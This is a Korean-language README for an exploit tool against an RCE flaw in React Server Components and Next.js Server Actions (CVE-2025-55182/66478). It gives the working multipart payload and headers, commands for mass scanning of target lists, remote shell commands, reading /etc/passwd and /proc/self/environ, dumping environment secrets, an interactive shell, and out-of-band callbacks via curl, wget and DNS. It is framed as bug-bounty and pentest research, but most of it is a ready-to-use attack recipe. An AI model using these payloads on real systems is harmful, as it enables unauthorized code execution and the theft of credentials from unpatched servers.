CVE-2025-55182 - React Server Components RCE 익스플로잇 v2.0
CVE-2025-55182 및 CVE-2025-66478 취약점을 React Server Components(RSC) 및 Next.js Server Actions에서 테스트하기 위한 포괄적인 보안 연구 도구입니다.
취약점 개요
| 속성 | 값 |
|---|
| CVE ID | CVE-2025-55182, CVE-2025-66478 |
| CVSS 점수 | 10.0 (CRITICAL) |
| 영향받는 버전 | React < 19.2.0, Next.js < 15.0.5 |
| 취약점 유형 | 원격 코드 실행 (RCE) |
| 공격 벡터 | 네트워크 |
기능
- PortSwigger 스타일의 다양한 탐지 페이로드를 사용한 취약점 스캔
- 여러 RCE 가제트(execSync, spawnSync, vm.runInThisContext 등)
- 블라인드 RCE 검증을 위한 OOB(out-of-band) 콜백 테스트
- 파일 읽기/쓰기 기능
- JavaScript 코드 실행
- 대화형 셸 모드
- 멀티 스레딩을 이용한 대량 스캔
- 프록시 지원 (Burp Suite 호환)
- JSON/텍스트 출력 형식
설치
요구 사항
pip install requests
Python 버전
빠른 시작
# 기본 취약점 확인
python3 exploit-custom.py -u https://target.com --check
# 전체 취약점 스캔 (권장)
python3 exploit-custom.py -u https://target.com --scan
# 프록시 사용 (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB 콜백 테스트
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# 명령 실행
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# 대화형 셸
python3 exploit-custom.py -u https://target.com --shell
사용법
명령줄 인수
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
대상 선택
| 인수 | 설명 | 예제 |
|---|
-u, --url | 단일 대상 URL | -u https://target.com |
-l, --list | URL을 포함한 파일 | -l targets.txt |
스캔 모드
| 인수 | 설명 |
|---|
--detect | Next.js/RSC 사용 여부 감지 |
--check | 빠른 취약점 확인 (수학 테스트) |
--scan | 전체 취약점 스캔 (PortSwigger 스타일) |
--test-all | 모든 가제트 및 탐지 페이로드 테스트 |
익스플로잇
| 인수 | 설명 | 예제 |
|---|
--cmd | 셸 명령 실행 | --cmd "id" |
--gadget | 사용할 가제트 지정 | --gadget execSync |
--read | 대상에서 파일 읽기 | --read /etc/passwd |
--write | 대상에 파일 쓰기 | --write /tmp/test.txt "content" |
--js | JavaScript 코드 실행 | --js "process.env" |
--shell | 대화형 셸 시작 | --shell |
--oob | OOB 콜백 호스트 | --oob xyz.oastify.com |
연결 옵션
| 인수 | 설명 | 예제 |
|---|
-p, --proxy | HTTP/HTTPS 프록시 | -p http://127.0.0.1:8080 |
-c, --cookies | 쿠키 문자열 | -c "session=abc123" |
-H, --header | 추가 헤더 (반복 가능) | -H "X-Custom: value" |
-t, --threads | 대량 스캔 스레드 수 | -t 20 |
--timeout | 요청 타임아웃 (초) | --timeout 60 |
출력 옵션
| 인수 | 설명 |
|---|
-o, --output | 결과를 파일로 저장 (.json 또는 .txt) |
-q, --quiet | 배너 출력 생략 |
스캔 예제
단일 대상
# Next.js 및 RSC 감지
python3 exploit-custom.py -u https://target.com --detect
# 빠른 취약점 확인
python3 exploit-custom.py -u https://target.com --check
# 모든 탐지 페이로드를 사용한 전체 스캔
python3 exploit-custom.py -u https://target.com --scan
# OOB 검증을 포함한 모든 가제트 테스트
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
대량 스캔
# 여러 대상 스캔
python3 exploit-custom.py -l targets.txt --scan -o results.json
# 스레드 수 증가
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# OOB 콜백 사용
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
익스플로잇 예제
명령 실행
# 기본 가제트 사용 (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# 특정 가제트 사용
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
파일 작업
# 파일 읽기
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# 파일 쓰기
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
JavaScript 실행
# 환경 변수 가져오기
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# 호스트 이름 가져오기
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# 디렉터리 목록
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
대화형 셸
python3 exploit-custom.py -u https://target.com --shell
셸 명령:
| 명령 | 설명 |
|---|
<command> | 셸 명령 실행 |
!read <file> | 파일 읽기 |
!write <file> <content> | 파일 쓰기 |
!js <code> | JavaScript 실행 |
!gadget <name> | 가제트 전환 |
exit | 셸 종료 |
사용 가능한 가제트
RCE 가제트
| 이름 | 모듈 ID | 설명 |
|---|
execSync | child_process#execSync | 직접 셸 명령 실행 |
execFileSync | child_process#execFileSync | 바이너리 파일 실행 |
spawnSync | child_process#spawnSync | 인수로 프로세스 실행 |
vm_runInThisContext | vm#runInThisContext | 현재 컨텍스트에서 JS 실행 |
vm_runInNewContext | vm#runInNewContext | 샌드박스 이스케이프로 JS 실행 |
vm_runInThisContext_global | vm#runInThisContext | global.process를 통해 실행 |
파일 가제트
| 이름 | 모듈 ID | 설명 |
|---|
fs_readFileSync | fs#readFileSync | 임의 파일 읽기 |
fs_writeFileSync | fs#writeFileSync | 임의 파일 쓰기 |
OOB 가제트
| 이름 | 설명 |
|---|
vm_fetch | fetch API를 통한 HTTP 요청 (Node 18+) |
vm_http | http 모듈을 통한 HTTP 요청 |
탐지 페이로드 (CVE-2025-66478)
--scan 모드는 다음 PortSwigger 스타일 탐지 페이로드를 사용합니다:
| 페이로드 | 설명 |
|---|
property_reference | 콜론으로 구분된 속성 참조 ["$1:a:a"] |
property_reference_v2 | 대체 참조 ["$1:b:b"] |
property_reference_constructor | 속성 참조를 통한 생성자 접근 |
property_reference_proto | 속성 참조를 통한 프로토 체인 접근 |
action_ref_vm | vm#runInThisContext를 사용한 ACTION_REF |
action_ref_execSync | child_process#execSync를 사용한 ACTION_REF |
OOB 콜백 방법
도구는 여러 OOB 콜백 방법을 지원합니다:
| 방법 | 설명 |
|---|
curl | curl 명령을 통한 HTTP 요청 |
wget | wget 명령을 통한 HTTP 요청 |
nslookup | DNS 쿼리 |
ping | ICMP 핑 |
fetch | Node.js fetch API |
http | Node.js http 모듈 |
출력 해석
터미널 색상
| 색상 | 상태 | 의미 |
|---|
| 초록색 | [VULN] | 취약함 - RCE 확인됨 |
| 노란색 | [PATCH] | 패치됨 - Server Actions가 활성화되어 있지만 보호됨 |
| 파란색 | [RSC] | Server Actions 감지됨 |
| 청록색 | [NEXT] | Next.js 감지됨 |
| 빨간색 | [ERR] | 연결 오류 |
스캔 결과
[VULN] property_reference 취약 패턴 감지!
-> 오류 다이제스트 패턴: E{"digest"... (OOB 검증 필요)
[SAFE] property_reference_v2 HTTP 200
[500] action_ref_vm digest:12345
기술적 세부 사항
RSC Flight 형식
도구는 React Server Components의 "flight 형식" 응답을 파싱합니다:
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}
멀티파트 페이로드 구조
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--
필수 HTTP 헤더
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
패치된 버전
React
Next.js
- 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
사용 사례
버그 바운티
# 1. 대상 목록 준비
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt
# 2. 대량 스캔
python3 exploit-custom.py -l targets.txt --scan -o results.json
# 3. OOB로 확인
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com
침투 테스트
# 1. 기술 스택 감지
python3 exploit-custom.py -u https://target.com --detect
# 2. Burp로 분석
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080